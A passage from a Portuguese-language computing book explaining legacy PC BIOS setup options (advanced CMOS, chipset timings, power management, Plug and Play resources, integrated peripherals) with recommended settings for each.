Terrorismo Tecnológico 450
Aprenda Para Sobreviver

E só. Em alguns setups podem aparecer algumas opções a mais:

• Floppy Mode 3 Support: Existe uma unidade de disquete


japonesa que é de 3 1/2" e 1.2 MB (em vez de 1.44 MB) e,
para que o micro a reconheça, é necessário habilitar esta
opção. Como você provavelmente não tem esse tipo de
unidade em seu micro, deixe essa opção desabilitada
(Disabled).

• Halt On: Essa opção informa ao micro em que situação de


erro ele deverá parar durante o auto teste inicial da máquina
(POST). A opção default é "All Errors", ou seja, em qualquer
situação de erro detectada durante o autoteste o micro irá
parar e uma mensagem de erro será apresentada. Já a opção
"All but keyboard" fará o micro parar em todos os tipos de
erro, menos em erros de teclado. E assim por diante de
acordo com as demais opções disponíveis. Nossa
recomendação é que você configure essa opção em "All
Errors".

• Daylight Saving: Essa opção não é muito comum e


provavelmente você só encontrará em micros muito antigos.
Essa opção habilita o ajuste automático do horário de verão
(que em inglês chama-se daylight saving). Acontece que esse
ajuste baseia-se nos EUA, onde o verão ocorre durante o
nosso inverno e, portanto, essa opção deve permanecer
desabilitada (Disabled).

É claro que em alguns micros você poderá encontrar outras


informações no setup básico, como a quantidade de memória RAM
instalada no micro. Mas as opções que você encontrará em todos os
setups são essas que apresentamos.
Terrorismo Tecnológico 451
Aprenda Para Sobreviver

Como o próprio nome indica, no setup avançado (Advanced CMOS


Setup) existem opções avançadas de configuração do micro.
Entretanto, a maioria das opções do setup avançado são ajustadas
de acordo com o gosto do usuário, como você perceberá. A seguir
iremos apresentar as opções mais comuns do setup avançado,
indicando a nossa recomendação de configuração, muito embora
você não precise seguir à risca nossas recomendações já que,
como dissemos, diversas opções são configuradas de acordo com o
gosto do usuário.

É importante notar que o setup do seu micro pode não ter todas as
opções aqui descritas, da mesma forma que podem existir opções
que não apresentamos aqui. Lembre-se que para habilitar uma
opção, você deverá configurá-la como "enabled" e, para desabilitar,
como "disabled".

• Typematic Rate Programming: Você pode configurar a taxa de


repetição de teclas do teclado habilitando essa opção, isto é,
ao manter uma tecla pressionada, ela começará a ser
repetida automaticamente. A configuração dessa taxa é feita
através das duas opções a seguir.

• Typematic Rate Delay: Configura o tempo que o micro


demorará para começar a repetir uma tecla caso você
mantenha ela pressionada. O valor configurado nessa opção
é dado em milissegundos.

• Typematic Rate: Configura a quantidade de caracteres por


segundo que a repetição automática irá gerar.
Terrorismo Tecnológico 452
Aprenda Para Sobreviver

• Quick Power On Self Test: Em BIOS Award, o teste de


memória é executado três vezes. Com essa opção habilitada,
o teste é feito somente uma vez, tornando o processo de boot
mais rápido.

• Above 1 MB Memory Test: Habilite essa opção para que o


micro teste toda a memória RAM durante a contagem de
memória. Caso essa opção não seja habilitada, o micro só irá
testar o primeiro 1 MB de memória, o que não é bom.

• Memory Test Tick Sound: Habilita o barulho ("tick") feito


durante a contagem de memória. O ajuste fica a gosto
pessoal.

• Hit <del> Message Display: Com essa opção habilitada, a


mensagem "Hit <del> To Run Setup" é mostrada durante a
contagem de memória. Nossa recomendação é que essa
opção permaneça habilitada, muito embora você continue
podendo entrar no setup normalmente mesmo que essa
mensagem não seja apresentada durante a contagem de
memória.

• Wait For <F1> If Any Error: Similarmente à opção anterior,


habilita a mensagem "Press <F1> To Resume" caso ocorra
algum erro durante o autoteste (POST). Recomendamos
habilitar essa opção.
Terrorismo Tecnológico 453
Aprenda Para Sobreviver

• System Boot Up Num Lock: Configura o estado da tecla Num


Lock ao ligar o micro. Nossa sugestão é habilitar essa opção.

• Floppy Drive Seek at Boot: Faz um teste, após a contagem de


memória, para ver se as unidades de disquete configuradas
no setup básico realmente estão instaladas. Nossa
recomendação é que você desabilite essa opção para que o
processo de boot torne-se mais rápido.

• System Boot Up Sequence: Configura a seqüência de boot,


isto é, de qual unidade o boot será dado. Nossa
recomendação é que você configure essa opção como "C
Only" (ou "C, A" caso essa opção não exista). Isso fará com
que o boot seja mais rápido (já que o micro irá ler diretamente
o sistema operacional do disco rígido) e evitará que o seu
micro seja contaminado por vírus de boot (já que o boot
através de disquete ficará desabilitado).

• Bootsector Virus Protection (ou Anti-virus ou Virus Warning):


Tome cuidado, pois o nome dessa opção induz a um erro.
Com essa opção habilitada, o micro não irá permitir que
nenhum programa atualize o setor de boot do disco rígido,
tarefa que algum vírus pode tentar efetuar. O grande
problema é que alguns utilitários de disco (como o Norton
Utilities) e o próprio programa de instalação do sistema
operacional alteram dados do setor de boot, fazendo com que
o micro acuse falsamente um erro quando essa opção está
habilitada. Aliás, é por isso que muitos técnicos não
conseguem instalar o sistema operacional quando essa opção
está habilitada. Por isso, nossa recomendação é que você
mantenha essa opção desabilitada. Se você quer se proteger
contra vírus, use um bom programa anti-vírus.
Terrorismo Tecnológico 454
Aprenda Para Sobreviver

• Password Checking Option (ou Security Option): No menu


principal do setup podemos definir, através da opção Change
Password, uma senha que será pedida quando o micro é
ligado. Através dessa opção configuramos quando essa
senha será solicitada: sempre em que ligamos o micro (opção
Always ou System) ou então só quando tentamos entrar no
setup (opção Setup). A configuração fica a seu critério, de
acordo com a sua política de segurança.

• Swap Floppy Drive ou Floppy Drive Swapping: Essa opção


troca a unidade A com a B. Isto é, se a sua unidade A for de 5
1/4" e a B, de 3 1/2", habilitando essa opção a unidade A
passará a ser a de 3 1/2" e a B, a de 5 1/4". Como hoje em
dia a maioria dos micros só possui uma única unidade de
disquetes (de 3 1/2"), essa opção deve permanecer
desabilitada.

• PCI VGA Palette Snooping ou VGA Palette Snoop: Essa


opção compatibiliza algumas placas de vídeo antigas de alta
resolução com o padrão VGA. Como atualmente todas as
placas de vídeo são compatíveis com esse padrão, essa
opção deve ficar desabilitada.

• Hard Disk Type 47 RAM Area ou Extended ROM RAM Area


ou Extended BIOS RAM Area ou Scratch RAM Option: Essa
opção configura como será acessada a área de memória
RAM que o BIOS usa como rascunho. Existem duas opções:
"DOS 1KB", que diminui a memória convencional de 640 KB
para 639 KB e usa essa área de 1 KB para acessar a área de
rascunho; ou "0:300", que usa o endereço 300h para acessar
Terrorismo Tecnológico 455
Aprenda Para Sobreviver

essa área de rascunho. A primeira opção é melhor, já que a


segunda opção normalmente fará com que o seu micro
apresente conflito com uma placa de rede, que placas de rede
normalmente utilizam o endereço 300h para se comunicarem
com o micro. Essa perda de 1 KB de memória atualmente é
desprezível.

• External Cache Memory ou L2 Cache Memory: Habilita o


cache de memória L2. Habilite, ou o seu micro ficará muito
lento.

• Internal Cache Memory ou L1 Cache Memory: Habilita o


cache de memória L1. Habilite, ou o seu micro ficará muito
lento.

• System BIOS Cacheable ou System ROM Cacheable ou


System BIOS Cacheable: Essa opção faz com que o BIOS do
micro seja acessado usando o cache de memória, o que
aumenta o desempenho do micro consideravelmente.
Portanto, habilite essa opção.

• Video BIOS Cacheable ou Video Cacheable Option ou Video


ROM Cache: Idem para a memória ROM da placa de vídeo.
Habilite essa opção.

• System ROM Shadow ou Main BIOS Shadow ou Adaptor


ROM Shadow F000, 64K ou F Segment Shadow: O shadow é
uma técnica onde o conteúdo da memória ROM é copiado
Terrorismo Tecnológico 456
Aprenda Para Sobreviver

para a memória RAM e a memória RAM passa a ser


acessada em vez da ROM. Isso é feito de forma a aumentar o
desempenho do micro, já que o tempo de acesso da memória
ROM é maior do que o tempo de acesso da memória RAM
(ou seja, a memória ROM é mais lenta do que a RAM). Essa
opção habilita o shadow do BIOS do micro, fazendo com que
o conteúdo do BIOS seja copiado para a RAM e, a partir de
então, o processador passa a acessar a cópia do BIOS que
está na memória RAM e não mais diretamente a memória
ROM do micro. Obviamente recomendamos que essa opção
seja habilitada.

• Video ROM Shadow ou Adaptor ROM Shadow C000, 32K ou


Adaptor ROM Shadow C400, 16K: Idem para a ROM da placa
de vídeo. Recomendamos que essa opção seja habilitada.

• Outras opções de Shadow: Outras opções de shadow


deverão permanecer desabilitadas, já que normalmente não
há outras memórias ROM no micro e, portanto, não há a
necessidade de se habilitar shadow de outras áreas de
memória.

• Floppy Disk Acess Control: Essa opção configura se o usuário


terá acesso total à unidade de disquete (opção R/W,
Read/Write) ou se ele poderá apenas ler disquetes (opção
Read Only). Configure em "R/W", a não ser em algum caso
particular que você não queira permitir gravação em
disquetes.
Terrorismo Tecnológico 457
Aprenda Para Sobreviver

• HDD Sequence SCSI/IDE First: Se você tiver um disco rígido


IDE e um SCSI instalados ao mesmo tempo no micro, você
poderá configurar, através desta opção, qual deles que dará
boot. Se você não tiver um disco SCSI, deixe essa opção em
"IDE". Caso contrário, ajuste conforme a sua necessidade.

• Assign IRQ for VGA: Essa opção força a placa de vídeo a


usar uma linha de interrupção. Se desabilitarmos essa opção,
a placa de vídeo não usará uma IRQ, liberando uma
interrupção para ser usada para algum outro periférico, o que
pode ser conveniente em alguns casos (micros lotados de
periféricos gerando conflitos de interrupção com a placa de
vídeo). Embora isso possa parecer interessante, os
programas DOS (sobretudo jogos) não conseguirão acessar o
vídeo com mais de 256 cores se essa opção estiver
desabilitada. Por isso, recomendamos que você deixe essa
opção habilitada. Inclusive essa é a solução do caso clássico
de você não estar conseguindo configurar mais de 256 cores
em seu jogos predileto.

• Init Display First: Se você tiver mais de uma placa de vídeo


instalada no micro (para aproveitar o suporte a múltiplos
monitores do Windows 98) e uma delas for AGP, você deverá
configurar através dessa opção qual placa de vídeo irá
inicializar primeiro: a placa AGP ou a placa PCI. Você deve
ajustar conforme o seu gosto pessoal. Em micros com vídeo
on-board, essa opção serve também para desabilitar o vídeo
on-board (instalando-se uma placa de vídeo PCI e
configurando essa opção em "PCI"). No caso de você não ter
mais de uma placa de vídeo, essa opção é ignorada.
Terrorismo Tecnológico 458
Aprenda Para Sobreviver

• BIOS Update: Essa opção habilita o upgrade de BIOS. Existe


um vírus famoso, chamado CIH (mais conhecido como
Spacefiller ou Chernobyl), que apaga o BIOS. Se essa opção
estiver desabilitada, o upgrade de BIOS não é possível, bem
como esse vírus não conseguirá apagar o BIOS de seu micro,
caso o seu micro seja infectado. Nossa recomendação é que
você desabilite essa opção e só a habilite durante o
procedimento de upgrade de BIOS (esse procedimento
raramente é necessário para a maioria dos usuários).

• Report No FDD For Win95: Habilite essa opção somente se


você não tiver nenhuma unidade de disquete instalada no
micro. Normalmente essa opção deve ficar desabilitada.

• Delay for HDD: Discos rígidos muito antigos demoram um


tempo para atingirem a sua velocidade de rotação. O sintoma
mais comum desse problema é você ligar o micro e aparecer
a mensagem de erro "HDD Controller Failure", mas, dando
um reset, o micro passa a funcionar perfeitamente. Isso
ocorre justamente porque, da primeira vez que o micro tentou
dar o boot, o disco ainda não tinha atingido a sua velocidade
de rotação correta, fazendo com que fosse apresentada uma
mensagem de erro. Se isto estiver ocorrendo, você pode
configurar um tempo de espera (em segundos) que será dado
após a contagem de memória para ser dado o início da leitura
do disco rígido. Como esse problema só ocorre em discos
rígidos antigos, deixe essa opção desabilitada (ou em "0").

• S.M.A.R.T. For Hard Disks: Habilita o modo SMART (Self-


Monitoring, Analysis and Reporting Technology) do disco
rígido, caso ele possua essa tecnologia (todos os discos
rígidos novos tem). Trata-se de um diagnóstico interno
Terrorismo Tecnológico 459
Aprenda Para Sobreviver

preventivo que é executado pelo disco rígido que informa ao


micro caso o disco rígido tenha alguma possibilidade de se
danificar no futuro, dando tempo do usuário fazer backup de
seus dados antes de uma "catástrofe" acontecer.
Recomendamos que você habilite essa opção.

• Graphics Aperture Size: As placas de vídeo AGP podem


usam a memória RAM do micro para armazenarem
informações de z-buffering e de texturas. Essa opção define
até quanto de memória RAM essas placas de vídeo podem
usar para si. Em geral você pode deixar essa opção
configurada em seu valor default, mas você pode
experimentar mudar o valor caso esteja encontrando erros em
jogos 3D.

• CPU Level 2 Cache ECC Checking: Processadores Intel a


partir do Pentium II-300 permitem que seja usado um modo
avançado de correção de erros no acesso à sua memória
cache L2, chamado ECC (Error Correction Check). Esse
método de acesso aumenta a confiabilidade dos dados.
Embora possa parecer interessante habilitar essa opção, ela
diminui o desempenho do micro, já que o processador gastará
mais tempo no armazenamento e na leitura de dados do
cache de memória, por conta dessa verificação de erros.
Portanto, nossa sugestão é que você desabilite essa opção.

• System BIOS Cacheable ou System ROM Cacheable ou


System BIOS Shadow Cacheable: Essa opção habilita o uso
do cache de memória no acesso ao BIOS do micro. Como o
BIOS é acessado o tempo todo e como o uso do cache de
memória aumenta o desempenho do micro, essa opção faz
Terrorismo Tecnológico 460
Aprenda Para Sobreviver

com que o desempenho do micro aumente. Por isso


recomendamos que essa opção seja habilitada.

• Video BIOS Cacheable ou Video Cacheable Option ou Video


ROM Cache: Essa opção faz o mesmo que a opção anterior,
só que para a memória ROM localizada na placa de vídeo.
Recomendamos que essa opção seja habilitada, para que o
desempenho de vídeo seja aumentado.

Essas foram as principais configurações existentes no setup


avançado (Advanced CMOS setup). A seguir iremos ver as
principais opções existentes no setup avançado do chipset
(Advanced Chipset Setup). A maioria das opções desse menu dizem
respeito a configuração do acesso à memória RAM. Por isso, tome
muito cuidado ao alterar alguma opção, pois uma configuração mal
feita pode fazer com que o micro fique travando. Caso o micro
passe a travar após você ter habilitado alguma opção, basta reiniciar
o micro e desfazer as alterações efetuadas no setup para que o
micro volte a funcionar normalmente. Muito embora algumas vezes
iremos sugerir habilitar algumas opções, pode ser que o seu micro
não suporte essa opção habilitada (ele ficará travando).

• Memory Parity Error Check: Habilita o teste de paridade.


Como a maioria das memórias hoje em dia não possuem chip
de paridade, recomendamos que essa opção seja
desabilitada, para que você não obtenha a mensagem de erro
de paridade aleatoriamente.

• DRAM ECC/Parity Select: Seleciona qual será o método de


correção de erros empregado no acesso à memória RAM:
Terrorismo Tecnológico 461
Aprenda Para Sobreviver

ECC ou paridade. O método ECC só poderá ser selecionado


caso você tenha uma memória RAM do tipo ECC, que é
minoria em nosso mercado e é mais vendida para servidores
de rede. A não ser que o seu micro tenha memória ECC
instalada (o que achamos pouco provável), configure essa
opção em "Parity".

• ECC Checking/Generation: Habilita o esquema ECC de


correção de erros. Só habilite essa opção caso o seu micro
tenha memória RAM com suporte a esse método de correção
de erros (que, como dissemos, achamos improvável).

• Run OS/2 >= 64 MB ou OS Select for DRAM > 64 MB: Caso


você use o sistema operacional OS/2, você deverá habilitar
essa opção para acessar mais de 64 MB de memória RAM.
Como a maioria dos usuários usa Windows 9x, desabilite essa
opção (ou coloque em "Non-OS/2").

• Fast EDO Path Select: Habilite essa opção caso a memória


de seu micro seja do tipo EDO.

A maioria das configurações do setup avançado do chipset


(Advanced Chipset Setup) fica presa a uma configuração padrão e
normalmente você só pode alterar essas configurações caso você
desabilite a opção Auto Configuration ou Auto Config existente. Isso
ocorre porque as configurações desse menu normalmente envolvem
base de tempo, e toda configuração dessa natureza faz com que o
micro trave caso você configure um valor errado.
Terrorismo Tecnológico 462
Aprenda Para Sobreviver

Dessa forma, se você não quiser correr riscos, o melhor a fazer é


habilitar a configuração automática e não mexer nas configurações
que ficam truncadas por essa opção.

Dentre as inúmeras opções envolvendo base de tempo estão as


configurações de wait states. Wait states são pulsos de clock
adicionados ao ciclo de leitura ou escrita em memória de modo a
casar a velocidade do processador com a velocidade da memória
RAM, pois a memória RAM é bem mais lenta que o processador.
Durante os pulsos de wait state o processador não faz
absolutamente nada, ele fica somente esperando a memória RAM
ficar pronta para receber ou enviar os dados. Ou seja, o uso de wait
state faz com que o desempenho do micro diminua. Acontece que
não há como o processador acessar diretamente a memória RAM
sem o uso de wait states.

Dessa forma, quanto menos wait states o processador usar, melhor.


Isso significa que você pode tentar diminuir a quantidade de wait
states para ganhar um pouco mais de desempenho em seu micro. A
configuração automática (Auto Config) não coloca os melhores
valores de wait states, mas sim os valores que com certeza não
farão com que o micro trave. Por isso, há a chance de você diminuir
o número de wait states e o micro não travar.

Se você decidir por diminuir os wait states, desabilite a opção Auto


Config e diminua o número usado por cada opção, uma de cada
vez. Por exemplo, imagine que a opção CAS Read Wait State esteja
configurada em "4" (ou seja, usando 4 wait states). Você pode
diminuir esse valor para 3, salvar as alterações e tentar usar o micro
um pouco para ver se ele não trava. Se travar, você deve reiniciar o
micro, entrar no setup e desfazer a última alteração feita. Caso o
micro não trave, você pode tentar diminuir ainda mais esse número,
repetindo todo o processo até achar o valor ideal (que é sempre um
antes do micro travar).

Só não experimente mudar um monte de opções ao mesmo tempo,


pois caso o micro trave você não saberá qual opção você mudou
que está fazendo com que o micro trave. O ajuste fino de wait states
Terrorismo Tecnológico 463
Aprenda Para Sobreviver

deve ser feito individualmente para cada opção existente. É um


processo demorado, mas que, como dissemos, pode render um
desempenho extra para o micro.

Se você não tem paciência para fazer esse ajuste fino ou não tem o
tempo necessário para fazê-lo, não se preocupe: baste habilitar a
opção Auto Configuration e esqueça essa história de ajuste de wait
states.

As principais opções de ajuste de wait states são as seguintes:

• Cas Read Wait State ou DRAM Read Wait States: Número de


wait states usado na leitura da memória RAM.

• CAS Write Wait State ou DRAM Write Wait States ou DRAM


Wait State Select ou DRAM Write CAS Pulse: Idem para a
escrita em memória.

• Memory Wait State ou DRAM Wait State: Alguns setups


apresentam somente uma única opção para o ajuste de wait
states.

• DRAM Speed Option: Em alguns setups o número de wait


states não aparece de forma numérica, mas sim através de
rótulos: Fastest (0 wait state), Faster (1 wait state), Slower (2
wait states) e Slowest (3 wait states). Através dessa opção
você ajusta o número de wait states da mesma forma que nas
outras opções apresentadas. Por exemplo, configurá-la em
"Faster" é equivalente a configurá-la com 1 wait state.
Terrorismo Tecnológico 464
Aprenda Para Sobreviver

Em geral, opções que tenham a ver com base de tempo devem ser
configuradas da mesma maneira do que wait states. Isto é, quanto
menor o tempo, maior o desempenho. Mas, para isso, você deve
achar o valor exato da configuração, conforme explicamos na
semana passada. As seguintes opções podem ser configuradas da
mesma forma que wait states:

• RAS to CAS Delay ou Fast RAS to CAS Delay: Define


quantos pulsos de clock existirão entre os sinais de RAS e
CAS, responsáveis pelo acesso à memória RAM.

• DRAM RAS Precharge Time: Número de pulsos de clock


necessários para que o sinal RAS (responsável pelo acesso à
memória) acumule carga antes de um ciclo de refresh (ciclo
que consiste em varrer a memória para recarregar os valores
nela armazenados).

• DRAM R/W Leadoff Timing: Número de pulsos de clock


necessários antes do início de um ciclo de leitura ou escrita
em memória.

A seguir veremos outras opções comuns de serem encontradas no


setup avançado do chipset.

• DRAM Speed: Configure com o tempo de acesso das


memórias instaladas no micro.
Terrorismo Tecnológico 465
Aprenda Para Sobreviver

• DRAM Speculative Leadoff: O chipset da placa-mãe pode


especular qual será o próximo endereço a ser lido pelo
processador, aumentando o desempenho do acesso à
memória RAM. Recomendamos que você habilite esta opção.

• Turn-around Insertion: Insere um wait state nos acessos a


dois dados consecutivos na memória. Desabilite esta opção
para eliminar este wait state e, com isso, aumentar o
desempenho do micro.

• Read-around Write: Se um dado for lido de um endereço


recém-escrito na memória RAM, o controlador de memória
(que está embutido no chipset da placa-mãe) poderá entregar
esse dado ao processador sem a necessidade de lê-lo da
memória, já que ele ainda estará armazenado internamente
no chipset. Habilite essa opção para ganhar desempenho.

• I/O Recovery Time ou AT Cycle Wait State ou AT Cycle


Between I/O Cycles ou 8 Bit I/O Recovery Time ou 16 Bit I/O
Recovery Time: Configura wait states para serem utilizados
no acesso a dispositivos instalados no barramento ISA. Como
o uso de wait states piora o desempenho, recomendamos
desabilitar essas opções (ou seja, configurá-las em 0 wait
states) ou, se não for possível, configurar o uso de apenas um
wait state.
Terrorismo Tecnológico 466
Aprenda Para Sobreviver

• ISA Line Buffer: Habilita um buffer de dados para o


barramento ISA, aumentando o seu desempenho.
Recomendamos, portanto, que você habilite esta opção.

• Memory Hole ou Memory Hole At 15 MB Add: Cria um


“buraco” na área de memória entre 15 MB e 16 MB, para que
o micro fique compatível com algumas placas de vídeo ISA
antigas que usavam essa área para si. Como essa opção faz
com que o micro perca 1 MB de memória, sugerimos que
você mantenha ela desabilitada.

As opções a seguir aumentam o desempenho do micro quando


habilitadas, por isso recomendamos que você as habilite. Mas nem
todos os micros são 100% compatíveis com essas opções e, com
isso, o micro pode travar depois de você ter habilitado alguma
dessas opções. Se isso ocorrer, basta desabilitar a opção que está
gerando o problema.

• CPU Burst Write ou CPU-to-Memory Burst Write: Aumenta o


desempenho de escrita na memória RAM.

• PCI Bursting ou Host-to-PCI Burst Write ou PCI Burst Mode


ou PCI Burst Write Combine ou PCI Dynamic Bursting:
Aumenta o desempenho do barramento PCI, habilitando o seu
modo burst.
Terrorismo Tecnológico 467
Aprenda Para Sobreviver

• PCI Concurrency ou Peer Concurrency: Permite que o


barramento PCI atenda a mais de um dispositivo PCI por vez,
aumentando o desempenho.

• PCI Streaming: Permite a transferência de pacotes de dados


maiores, aumentando o desempenho do barramento PCI.

• PCI-to-DRAM Pipeline: Aumenta o desempenho de escrita de


dados feita pelo barramento PCI na memória RAM.

• CPU-to-PCI Write Post ou CPU-to-PCI Write Buffer: Habilita


uma memória (chamada buffer) para o armazenamento
temporário dos dados enviados pelo processador ao
barramento PCI, caso o barramento não esteja pronto para
receber dados, liberando o processador para a realização de
outra tarefa. Caso essa opção não seja habilitada, o
processador terá de esperar o barramento ficar pronto para
receber dados, diminuindo o desempenho de escrita no
barramento PCI.

• PCI Master 0 WS Write: Permite que dispositivos PCI


escrevam na memória RAM sem usar wait states.

• Passive Release: Aumenta o desempenho do barramento


PCI.
Terrorismo Tecnológico 468
Aprenda Para Sobreviver

Vamos ver mais algumas opções presentes no setup avançado:

• PCI IRQ Activate By: Configura se as interrupções do


barramento PCI serão ativadas pelo flanco (edge) ou nível
(level) do sinal do pedido de interrupção. Nossa sugestão é
que você configure em "level".

• Delay Transaction ou PCI 2.1 Support: Compatibiliza o chipset


da placa-mãe com a especificação PCI 2.1. Recomendamos
habilitar.

• AT Bus Clock ou AT Clock Selection ou Bus Clock Frequency


Select ou ISA Bus Clock Option ou AR Bus Clock Control ou
PCICLK-to-ISA Sysclk Divisor: Essa opção configura o clock
que será utilizado pelo barramento ISA, que deve funcionar a
8 MHz. Acontece que a maioria das placas-mãe não possuem
um gerador de clock de 8 MHz, e daí, para gerarem esse
clock, usam um divisor ou do clock do barramento externo do
processador (Bus Clock ou Sysclock) ou do clock do
barramento PCI (PCICLK). Como o clock do barramento PCI
é de 33 MHz, normalmente devemos configurar essa opção
em "1/4 PCICLK" (que configurará o clock do barramento ISA
em 8,25 MHz). Você mesmo poderá fazer as contas para
saber a melhor configuração para essa opção. Lembramos
que dispositivos ISA normalmente não conseguem trabalhar
muito acima de 8 MHz. Portanto, se você configurar essa
opção para um clock mais alto - por exemplo 11 MHz - os
dispositivos ISA de seu micro provavelmente não funcionarão.
Terrorismo Tecnológico 469
Aprenda Para Sobreviver

Agora que nós já vimos as opções mais importantes do setup


avançado (Advanced CMOS Setup e Advanced Chipset Setup),
iremos ver a configuração do gerenciamento de consumo elétrico
avançado do micro (Advanced Power Management), que é feita
através do menu Power Management (ou equivalente) do setup.

O micro possui diversos modos de "hibernação". Nesses modos de


hibernação, o micro consome menos eletricidade. Isso é conseguido
de diversas formas, como, por exemplo, diminuindo o clock do
processador ou desligando o disco rígido. É claro que o micro só
entra em modo de hibernação depois de estar um determinado
tempo ocioso, isto é, sem fazer absolutamente nada. É justamente
na configuração do gerenciamento do consumo elétrico do micro
que você configura o tempo de ociosidade necessário para que o
micro entre em modo de hibernação.

Existem três modos de hibernação: Doze, Standby e Suspend. A


diferença entre eles é a "profundidade" da hibernação. Quanto mais
profundo for o "sono" do micro, mais você economizará energia. O
modo Doze é o mais superficial e o Suspend, o mais profundo.

No setup você configura o tempo de ociosidade necessário para o


micro entrar nesses modos de hibernação. Fora isso você configura
quanto tempo de ociosidade é necessário para que o disco rígido
seja desligado (opção IDE Power Control ou HDD Power Down
Time) ou ainda configura para que a ventoinha do processador seja
desligada quando ele entrar em modo Suspend (opção CPU Fan
Off). Como o clock do processador é reduzido quando ele entra
neste modo, a ventoinha pode ser desligada, já que o processador
não esquentará tanto.

Você também pode configurar o tipo de atividade que "acordará" o


micro. Um bom exemplo é o modem. Muita gente usa o modem
como fax e deixa o micro ligado durante o dia esperando ligações de
fax. Para economizar energia, você pode configurar o micro a entrar
em modo de hibernação e acordar automaticamente quando o micro
receber alguma ligação de fax, voltando a entrar em modo de
Terrorismo Tecnológico 470
Aprenda Para Sobreviver

hibernação depois de um período de ociosidade. Esse recurso é


chamado Wake-up On Ring.

Na maioria dos setups há uma configuração de que pedido de


interrupção (IRQ) acordará o micro. Isto significa que se houver
alguma atividade no dispositivo que estiver usando aquela IRQ, o
micro acordará. Por exemplo, o teclado usa a interrupção 1 (IRQ1).
Com isso, se você configurar que a IRQ1 acordará o micro, significa
dizer que o teclado acordará o micro. O mesmo ocorre para todos
os demais dispositivos conectados ao micro, como, por exemplo, o
mouse serial, que normalmente usa a IRQ4 (ou seja, configurando a
IRQ4 para acordar o micro, o micro sairá do modo de hibernação
quando você mexer no mouse). Você pode obter uma lista completa
de quais interrupções são usadas pelos dispositivos de seu micro
através de Gerenciador de Dispositivos (ícone Sistema do Painel de
Controle), selecionando Computador e clicando na caixa
Propriedades.

Com o gerenciamento de consumo elétrico habilitado no setup, o


Windows 9x passa a ter mais uma opção no menu Iniciar:
Suspender. Essa opção coloca o micro imediatamente em modo
Suspend, não sendo necessário esperar o tempo de ociosidade
programado no setup.

É claro que em seu micro poderão existir inúmeras outras funções


no menu de configuração do gerenciamento de consumo elétrico,
mas entendendo o que explicamos hoje, você saberá configurá-las
intuitivamente.

No setup existe um menu para a configuração do barramento PCI e


dos dispositivos ISA Plug and Play, normalmente chamado PCI/Plug
and Play Setup. A correta configuração desse menu é importante
para que não existam conflitos de interrupção ou DMA em seu
micro, especialmente se você tiver algum periférico antigo instalado,
como, por exemplo, uma placa de som.

Normalmente quando dois ou mais periféricos estão configurados a


usar um mesmo recurso, eles não funcionam corretamente. Quando
Terrorismo Tecnológico 471
Aprenda Para Sobreviver

dois dispositivos Plug and Play são instalados usando um mesmo


recurso (uma mesma linha de interrupção ou canal de DMA), o
próprio sistema operacional pode reconfigurar automaticamente os
dispositivos, de modo a resolver o conflito de recursos.

Dispositivos ISA antigos não são Plug and Play e, com isso, não há
como alterar suas configurações por software, isto é, através do
sistema operacional (nesse tipo de periférico a configuração é
normalmente feita através de jumpers). Se um dispositivo Plug and
Play "cismar" em usar uma mesma interrupção ou canal de DMA
que um periférico antigo não Plug and Play, pode ser que o sistema
não consiga gerenciar esse conflito, fazendo com que os periféricos
entrem em conflito e não funcionem.

Por isso, no setup do micro há como definir manualmente quais


linhas de interrupção (IRQ) e quais canais de DMA estão sendo
usados por dispositivos antigos não Plug and Play. Assim, esses
recursos são separados pelo sistema e nenhum dispositivo Plug and
Play poderá utilizá-los.

Se tiver qualquer dispositivo antigo não plug and play instalado em


seu micro – como, por exemplo, uma placa de som ou fax modem –
você deve efetuar esse procedimento. Placas de som normalmente
usam a IRQ5, o DMA1 e o DMA5, enquanto placas de fax modem
normalmente usam a IRQ3.

A configuração é feita através de opções como "IRQ x Available To"


e "DMA x Available To". Existem duas possibilidades de
configuração: "PCI/PnP", caso o recurso esteja sendo utilizado por
um dispositivo PCI ou ISA Plug and Play, ou então "ISA/EISA" (ou
"Legacy ISA"), caso o recurso esteja sendo usado por um
dispositivo não Plug and Play.

Por exemplo, se você tiver uma placa de som antiga no micro,


provavelmente deverá configurar "IRQ5 Available To", "DMA1
Available To" e "DMA5 Available To" em "Legacy ISA", enquanto as
demais opções deverão ficar em "PCI/PnP".
Terrorismo Tecnológico 472
Aprenda Para Sobreviver

Caso você não tenha placas antigas instaladas em seu micro, você
pode simplesmente configurar a opção "Resources Controlled By"
em "Auto", para informar que todos os periféricos de seu micro são
Plug and Play. No caso de existir ao menos uma placa antiga, não
Plug and Play, instalada em seu micro, você deverá deixar essa
opção em "Manual" e efetuar a configuração que descrevemos.

A opção "PnP OS Installed" existente nesse menu deve ser


habilitada caso você esteja usando o Windows 9x.

Hoje veremos o menu Peripheral Setup (ou Integrated Peripherals),


que configura todos os periféricos que estão integrados na placa-
mãe (isto é, on-board), incluindo as portas seriais, porta paralela,
portas IDE e controladora de unidade de disquete.

As opções mais comumente encontradas nesse menu são:

• On Chip VGA: Habilita o vídeo on-board, caso a sua placa-


mãe possua esse recurso. Caso você queira desabilitar o
vídeo on-board para instalar uma placa de vídeo em um dos
slots do micro, basta desabilitar essa opção.

• On Board VGA Memory Size ou VGA Shared Memory Size:


Em micros com vídeo on-board que usam a arquitetura UMA
(Unified Memory Architecture, Arquitetura Unificada de
Memória) o chipset da placa-mãe usa parte da memória RAM
como memória de vídeo. Nessa opção você especifica o
quanto de memória RAM será utilizado para vídeo. Quanto
mais você especificar, pior, pois mais memória você perderá
para o uso de aplicações. A quantidade ideal depende da
resolução que você for trabalhar no Windows.
Recomendamos a seguinte configuração: 640x480, 1 MB;
800x600, 2 MB; 1.024x768 ou 1.280x1.024, 4 MB. Por
exemplo, é besteira configurar o micro a usar 4 MB de
Terrorismo Tecnológico 473
Aprenda Para Sobreviver

memória de vídeo se a resolução usada for 640x480, pois


essa resolução não usa mais do que 1 MB de memória de
vídeo. Com isso, você perderá 3 MB de memória à toa.

• On Board Sound: Habilita o áudio on-board, caso a sua placa-


mãe possua. Desabilite essa opção caso você queira instalar
uma placa de som avulsa em um dos slots do micro.

• Programming Mode: Se você configurar essa opção em


"auto", o setup configurará automaticamente as demais
opções existentes neste menu. Já em "manual", você poderá
configurar manualmente as opções existentes.

• On Board FDC: Habilita a controladora de unidade de


disquetes (deixar habilitado).

• FDD AB Exchange Function ou Swap Floppy Drive: Troca


logicamente a unidade A com a B. Deixe essa opção
desabilitada.

• Serial Port 1: Configura a porta serial 1. Deixe em "Auto" ou


"COM1" ou "3F8".

• Serial Port 2: Configura a porta serial 2. Se você tem um fax


modem instalado no micro usando o endereço COM2, você
